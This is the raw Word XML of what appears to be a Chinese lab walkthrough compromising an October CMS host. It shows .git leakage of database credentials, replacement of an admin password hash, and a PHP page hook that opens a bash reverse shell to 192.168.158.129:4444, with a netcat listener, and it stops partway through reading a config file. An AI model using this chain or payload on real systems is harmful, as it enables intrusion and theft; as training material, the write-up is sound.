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E985" w14:textId="4D8BE6B0" w:rsidR="00C42122" w:rsidRDefault="00D46A62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扫描目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1DBC8A" w14:textId="4F036F0B" w:rsidR="00D46A62" w:rsidRDefault="00D46A62">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B273EB0" wp14:editId="12868E07">
            <wp:extent cx="5274310" cy="3216910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="254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E44B" w14:textId="03782892" w:rsidR="00D46A62" w:rsidRDefault="00D46A62">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可疑目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6A62" w14:paraId="3E5EF976" w14:textId="77777777" w:rsidTr="00D46A62">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="565E9647" w14:textId="4FD9DE5E" w:rsidR="00D46A62" w:rsidRDefault="00D46A62" w:rsidP="00D46A62">
            <w:r>
              <w:t xml:space="preserve">+ http://192.168.158.130/.git/HEAD (CODE:200|SIZE:23)                                                                                                                                                           </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05B803E1" w14:textId="77777777" w:rsidR="00D46A62" w:rsidRDefault="00D46A62" w:rsidP="00D46A62">
            <w:r>
              <w:t xml:space="preserve">+ http://192.168.158.130/.htaccess (CODE:200|SIZE:1678)                                                                                                                                                         </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F79794B" w14:textId="77777777" w:rsidR="00D46A62" w:rsidRDefault="00D46A62" w:rsidP="00D46A62">
            <w:r>
              <w:t xml:space="preserve">+ http://192.168.158.130/0 (CODE:200|SIZE:12679)                                                                                                                                                                </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="722F390A" w14:textId="77777777" w:rsidR="00D46A62" w:rsidRDefault="00D46A62" w:rsidP="00D46A62">
            <w:r>
              <w:t xml:space="preserve">+ http://192.168.158.130/about (CODE:200|SIZE:18671)                                                                                                                                                            </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18AC2C25" w14:textId="77777777" w:rsidR="00D46A62" w:rsidRDefault="00D46A62" w:rsidP="00D46A62">
            <w:r>
              <w:t xml:space="preserve">+ http://192.168.158.130/About (CODE:200|SIZE:18671)                                                                                                                                                            </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79D0EB73" w14:textId="7A3EC5CF" w:rsidR="00D46A62" w:rsidRDefault="00D46A62" w:rsidP="00D46A62">
            <w:r>
              <w:t xml:space="preserve">+ http://192.168.158.130/backend (CODE:302|SIZE:41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3576D37" w14:textId="26757278" w:rsidR="00D46A62" w:rsidRDefault="00D46A62" w:rsidP="00D46A62">
            <w:r>
              <w:t xml:space="preserve">+ http://192.168.158.130/index.php (CODE:200|SIZE:12729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C05AC06" w14:textId="77777777" w:rsidR="00D46A62" w:rsidRDefault="00D46A62" w:rsidP="00D46A62">
            <w:r>
              <w:t xml:space="preserve">+ http://192.168.158.130/services (CODE:200|SIZE:10044)                                                                                                                                                         </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EF9C09C" w14:textId="30A5423D" w:rsidR="00D46A62" w:rsidRDefault="00D46A62" w:rsidP="00D46A62">
            <w:r>
              <w:t xml:space="preserve">+ http://192.168.158.130/Services (CODE:200|SIZE:10044)    </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="33B91480" w14:textId="0850369F" w:rsidR="00D46A62" w:rsidRDefault="00D46A62"/>
    <w:p w14:paraId="084C2CBC" w14:textId="6AB755F6" w:rsidR="00D46A62" w:rsidRDefault="00D46A62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尝试</w:t>
      </w:r>
      <w:r>
        <w:t>http://192.168.158.130/.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728EAF5C" w14:textId="0C2F27EE" w:rsidR="00D46A62" w:rsidRDefault="00D46A62">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="081B7D54" wp14:editId="65854470">
            <wp:extent cx="5274310" cy="2490470"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080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4FCD" w14:textId="58C17150" w:rsidR="00D46A62" w:rsidRDefault="00D46A62">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用git目录泄露工具</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1024F43D" w14:textId="30225301" w:rsidR="00D46A62" w:rsidRDefault="00D46A62">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FD707BC" wp14:editId="405FE52C">
            <wp:extent cx="5274310" cy="3688080"/>
            <wp:effectExtent l="0" t="0" r="2540" b="762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9B47" w14:textId="294241C1" w:rsidR="00D46A62" w:rsidRDefault="00D46A62">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DE14966" wp14:editId="56B0ACD5">
            <wp:extent cx="5274310" cy="3021965"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985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C1A1" w14:textId="568D7817" w:rsidR="00B42F8C" w:rsidRDefault="00D46A62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查看泄露的git目录文件 信息收集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4424FEDD" w14:textId="2B2749F0" w:rsidR="00D46A62" w:rsidRDefault="00D46A62">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D4C4612" wp14:editId="2AD029D1">
            <wp:extent cx="5274310" cy="572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61C5" w14:textId="5959F793" w:rsidR="00B42F8C" w:rsidRDefault="00B42F8C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库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F8C" w14:paraId="70932704" w14:textId="77777777" w:rsidTr="00B42F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66507653" w14:textId="77777777" w:rsidR="00B42F8C" w:rsidRDefault="00B42F8C" w:rsidP="00B42F8C">
            <w:r>
              <w:t>'</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mysql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; [</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37D82C57" w14:textId="77777777" w:rsidR="00B42F8C" w:rsidRDefault="00B42F8C" w:rsidP="00B42F8C">
            <w:r>
              <w:t xml:space="preserve">            'driver'     =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mysql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B29C571" w14:textId="77777777" w:rsidR="00B42F8C" w:rsidRDefault="00B42F8C" w:rsidP="00B42F8C">
            <w:r>
              <w:t xml:space="preserve">            'engine'     =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>InnoDB</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C8876F7" w14:textId="77777777" w:rsidR="00B42F8C" w:rsidRPr="00B42F8C" w:rsidRDefault="00B42F8C" w:rsidP="00B42F8C">
            <w:pPr>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00B42F8C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>'host'       =&gt; 'localhost',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A489F65" w14:textId="77777777" w:rsidR="00B42F8C" w:rsidRPr="00B42F8C" w:rsidRDefault="00B42F8C" w:rsidP="00B42F8C">
            <w:pPr>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B42F8C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">            'port'       =&gt; 3306,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F17D255" w14:textId="77777777" w:rsidR="00B42F8C" w:rsidRPr="00B42F8C" w:rsidRDefault="00B42F8C" w:rsidP="00B42F8C">
            <w:pPr>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B42F8C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve">            'database'   =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B42F8C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>octoberdb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B42F8C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FED159E" w14:textId="77777777" w:rsidR="00B42F8C" w:rsidRDefault="00B42F8C" w:rsidP="00B42F8C">
            <w:r w:rsidRPr="00B42F8C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve">            'username'   =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B42F8C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>october</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B42F8C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55632949" w14:textId="77777777" w:rsidR="00B42F8C" w:rsidRDefault="00B42F8C" w:rsidP="00B42F8C">
            <w:r>
              <w:t xml:space="preserve">            'password'   =&gt; 'SQ66EBYx4GT3byXH',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5833BC05" w14:textId="77777777" w:rsidR="00B42F8C" w:rsidRDefault="00B42F8C" w:rsidP="00B42F8C">
            <w:r>
              <w:t xml:space="preserve">            'charset'    =&gt; 'utf8mb4',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53C0F83D" w14:textId="77777777" w:rsidR="00B42F8C" w:rsidRDefault="00B42F8C" w:rsidP="00B42F8C">
            <w:r>
              <w:t xml:space="preserve">            'collation'  =&gt; 'utf8mb4_unicode_ci',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D000FA2" w14:textId="77777777" w:rsidR="00B42F8C" w:rsidRDefault="00B42F8C" w:rsidP="00B42F8C">
            <w:r>
              <w:t xml:space="preserve">            'prefix'     =&gt; '',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76647AA9" w14:textId="77777777" w:rsidR="00B42F8C" w:rsidRDefault="00B42F8C" w:rsidP="00B42F8C">
            <w:r>
              <w:t xml:space="preserve">            '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>varcharmax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 191,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D91771C" w14:textId="07C2AA2C" w:rsidR="00B42F8C" w:rsidRDefault="00B42F8C" w:rsidP="00B42F8C">
            <w:r>
              <w:t xml:space="preserve">        ],</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA67F2" w14:paraId="556C978B" w14:textId="77777777" w:rsidTr="00B42F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D50878A" w14:textId="77777777" w:rsidR="00CA67F2" w:rsidRDefault="00CA67F2" w:rsidP="00B42F8C"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B7B9A97" w14:textId="7F5F2EE7" w:rsidR="00B42F8C" w:rsidRDefault="00B42F8C"/>
    <w:p w14:paraId="01975985" w14:textId="487C2AAE" w:rsidR="00CA67F2" w:rsidRDefault="00CA67F2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尝试访问git目录中泄露的文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1486D5CF" w14:textId="768530E6" w:rsidR="00B42F8C" w:rsidRDefault="00CA67F2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FD612B5" wp14:editId="76A36C78">
            <wp:extent cx="5274310" cy="2106930"/>
            <wp:effectExtent l="0" t="0" r="2540" b="762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AC0" w14:textId="42A52EE1" w:rsidR="00CA67F2" w:rsidRDefault="00CA67F2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现数据库管理后台</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56044973" w14:textId="617BE7F1" w:rsidR="00CA67F2" w:rsidRDefault="00CA67F2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用上面的数据库信息登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697E0528" w14:textId="2298ABFF" w:rsidR="00CA67F2" w:rsidRDefault="00CA67F2"/>
    <w:p w14:paraId="560B0EA8" w14:textId="3D1F1199" w:rsidR="00CA67F2" w:rsidRDefault="00CA67F2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA3B81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库后台数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF2F611" w14:textId="7367EE53" w:rsidR="00DA3B81" w:rsidRDefault="00DA3B81">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05ADC9C4" wp14:editId="5A9DD101">
            <wp:extent cx="5274310" cy="19577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D39F" w14:textId="156DFD05" w:rsidR="00DA3B81" w:rsidRDefault="00DA3B81">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现了backend的user表，有账户名密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6AEA1B" w14:textId="3C02B2EC" w:rsidR="00DA3B81" w:rsidRDefault="00DA3B81">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改密码为admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E96DE20" w14:textId="1673984A" w:rsidR="00DA3B81" w:rsidRDefault="00DA3B81">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12189DC2" wp14:editId="12EFD964">
            <wp:extent cx="5274310" cy="4839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02E1" w14:textId="13E897C2" w:rsidR="00DA3B81" w:rsidRDefault="00DA3B81">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里的加密方式查了下资料发现：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4928F60F" w14:textId="5D129BA2" w:rsidR="00DA3B81" w:rsidRDefault="00DA3B81">
      <w:r w:rsidRPr="00DA3B81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>“如果密码长</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA3B81">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>60位 前面是“$2y$”类似这种字符开头的话 使用的是 crypt() 的加密方式</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA3B81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE96B7F" w14:textId="1956322C" w:rsidR="00DA3B81" w:rsidRDefault="00DA3B81">
      <w:r>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00DA3B81">
        <w:t>$2y$10$/CpTcHb.CwuUvKXHMjn.U.miYQlhT5aFTOoR5v7C53mCeURF8BQNC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACF7E01" w14:textId="5C656583" w:rsidR="00DA3B81" w:rsidRDefault="00DA3B81">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>23456</w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00DA3B81">
        <w:t>$2y$10$EJ64ugc3YEnGH2jaM06XCO68igbTx4LpkcfVPnzoJHRy8Wm8h0Hti</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F443A8" w14:textId="0DD4618C" w:rsidR="00DA3B81" w:rsidRDefault="00DA3B81"/>
    <w:p w14:paraId="163A1E1E" w14:textId="3BB6E2B4" w:rsidR="00A2680D" w:rsidRDefault="00A2680D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登录backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2025CCB1" w14:textId="7CE9BAED" w:rsidR="00A2680D" w:rsidRDefault="00A2680D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14C72B3B" wp14:editId="76C20B6A">
            <wp:extent cx="5274310" cy="1670685"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="9" name="图片 9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, Teams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139B" w14:textId="1069BC9D" w:rsidR="00A2680D" w:rsidRDefault="00A2680D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里可以添加页面，可以通过添加后门页面来是主机上线。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43759BCA" w14:textId="230FCACA" w:rsidR="00A2680D" w:rsidRDefault="00A2680D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16448D50" wp14:editId="344DADC2">
            <wp:extent cx="5274310" cy="2022475"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="10" name="图片 10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, 网站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5CA8" w14:textId="25E1FDDB" w:rsidR="00A2680D" w:rsidRDefault="00A2680D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本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80D" w14:paraId="4E06E3C5" w14:textId="77777777" w:rsidTr="00A2680D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4137C375" w14:textId="77777777" w:rsidR="00A2680D" w:rsidRDefault="00A2680D" w:rsidP="00A2680D">
            <w:r>
              <w:t xml:space="preserve">function </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>onStart</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13522DBB" w14:textId="77777777" w:rsidR="00A2680D" w:rsidRDefault="00A2680D" w:rsidP="00A2680D">
            <w:r>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52B12AAF" w14:textId="77777777" w:rsidR="00A2680D" w:rsidRDefault="00A2680D" w:rsidP="00A2680D">
            <w:r>
              <w:t xml:space="preserve">    $this-&gt;page["</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>PoisonVar</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>"] = system('bash -c \'exec bash -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> &amp;&gt;/dev/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/192.168.158.129/4444 &lt;&amp;1\'');</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A65CA19" w14:textId="71BF6DE9" w:rsidR="00A2680D" w:rsidRDefault="00A2680D" w:rsidP="00A2680D">
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="69D486C2" w14:textId="5A4393FD" w:rsidR="00A2680D" w:rsidRDefault="00A2680D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D912F64" wp14:editId="4F027E32">
            <wp:extent cx="5274310" cy="2021840"/>
            <wp:effectExtent l="0" t="0" r="254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E86F" w14:textId="554289FB" w:rsidR="00A2680D" w:rsidRDefault="00A2680D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保存，访问。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477C0C01" w14:textId="760453B0" w:rsidR="00F95AC0" w:rsidRDefault="00F95AC0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本来想用cobalt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>strike上线，没有反应，结果查了下资料发现不支持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放弃这个思路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0B80C6" w14:textId="3EC80069" w:rsidR="00F95AC0" w:rsidRDefault="00F95AC0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cobalt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>strike针对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渗透需要安装插件：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Cross C2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，适用版本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cobalt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>strike</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73237D81" w14:textId="397CCA64" w:rsidR="00A2680D" w:rsidRDefault="00A2680D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C3D09B2" wp14:editId="282F24A9">
            <wp:extent cx="5274310" cy="1215390"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="11" name="图片 1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4103" w14:textId="2430A052" w:rsidR="00F95AC0" w:rsidRDefault="00F95AC0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在本地用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进行监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5AC0" w14:paraId="43AA143E" w14:textId="77777777" w:rsidTr="00F95AC0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7398B023" w14:textId="22B19927" w:rsidR="00F95AC0" w:rsidRDefault="00F95AC0">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>n</w:t>
            </w:r>
            <w:r>
              <w:t>c</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lvp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78832C52" w14:textId="519E9BC3" w:rsidR="00F95AC0" w:rsidRDefault="00762DB7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CCA5611" wp14:editId="1838A990">
            <wp:extent cx="5274310" cy="934720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="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6609" w14:textId="50CDA897" w:rsidR="00F95AC0" w:rsidRDefault="00F95AC0"/>
    <w:p w14:paraId="7CC99A4B" w14:textId="0107CD96" w:rsidR="00762DB7" w:rsidRDefault="00762DB7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主机信息收集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783B5C29" w14:textId="6A99A01D" w:rsidR="00762DB7" w:rsidRDefault="00762DB7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现现在的目录是git泄露过的目录，于是退回到上一级目录查找，没有东西，再退，发现了一个backups文件夹，结合扫到的目录backend，进去看了下，有一个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配置文件，打开</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A0652F" w14:textId="2563812E" w:rsidR="00762DB7" w:rsidRDefault="00762DB7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="755F752F" wp14:editId="75F61EAA">
            <wp:extent cx="5274310" cy="7233285"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="15" name="图片 1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中度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D2F4" w14:textId="02B92CB5" w:rsidR="00762DB7" w:rsidRDefault="00762DB7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现数据库信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0B06D2" w14:textId="701EE3B0" w:rsidR="00762DB7" w:rsidRDefault="00762DB7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C11D018" wp14:editId="61782B7F">
            <wp:extent cx="5274310" cy="2799715"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="14" name="图片 1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358C" w14:paraId="78BABCF4" w14:textId="77777777" w:rsidTr="00C4358C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3379E16E" w14:textId="77777777" w:rsidR="00C4358C" w:rsidRDefault="00C4358C" w:rsidP="00C4358C">
            <w:r>
              <w:t>[database]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65CA1366" w14:textId="77777777" w:rsidR="00C4358C" w:rsidRDefault="00C4358C" w:rsidP="00C4358C">
            <w:r>
              <w:t>; Database to use. Either "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mysql</w:t>
